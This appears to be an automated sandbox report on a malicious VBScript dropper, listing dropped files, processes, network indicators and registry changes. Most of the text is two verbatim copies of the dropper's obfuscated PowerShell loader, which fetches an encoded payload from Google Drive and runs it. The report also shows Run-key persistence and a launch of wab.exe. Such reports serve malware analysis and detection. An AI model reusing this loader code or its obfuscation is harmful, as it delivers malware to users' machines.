Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
G4-TODOS.vbs
|
ASCII text, with very long lines (361), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbn2mgjy.gfg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjivrtsc.nu1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjzq1csg.qj4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yngfprbw.spv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Coleoptilum.Unw
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5;
$Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function
Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5
Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te
KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi)
tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/
Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre
ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv
Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand=
Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI
Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t
erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate
(Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng
ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu
IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe
');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT
Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort}
Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl
Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost
.eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei
Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl
BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw
re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato
Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate
(Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs
Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW
otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto
StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp
.ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit
');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon
twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat,
un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate
(Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT
OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety
');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri
KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR
steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria
bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP
Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds
'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl
Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj
peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate
(Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin
Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri
Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg
Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS
O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser
IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv
');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk
pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv]
Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea
CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l
Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh
flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab
n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5;
$Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function
Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5
Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te
KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi)
tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/
Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre
ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv
Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand=
Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI
Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t
erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate
(Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng
ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu
IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe
');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT
Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort}
Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl
Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost
.eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei
Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl
BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw
re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato
Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate
(Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs
Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW
otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto
StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp
.ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit
');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon
twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat,
un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate
(Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT
OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety
');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri
KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR
steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria
bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP
Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds
'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl
Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj
peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate
(Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin
Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri
Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg
Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS
O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser
IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv
');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk
pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv]
Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea
CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l
Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh
flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab
n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://r3.i.lencr.org/0R
|
unknown
|
||
|
http://mail.cash4cars.nz
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://drive.google.com/q
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
https://drive.usercontent.google.comzE
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://r3.o.lencr.org0
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/i
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.cash4cars.nz
|
114.142.162.17
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
drive.google.com
|
142.250.101.113
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
||
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
114.142.162.17
|
mail.cash4cars.nz
|
Australia
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
142.250.101.113
|
drive.google.com
|
United States
|
||
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
newfile
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
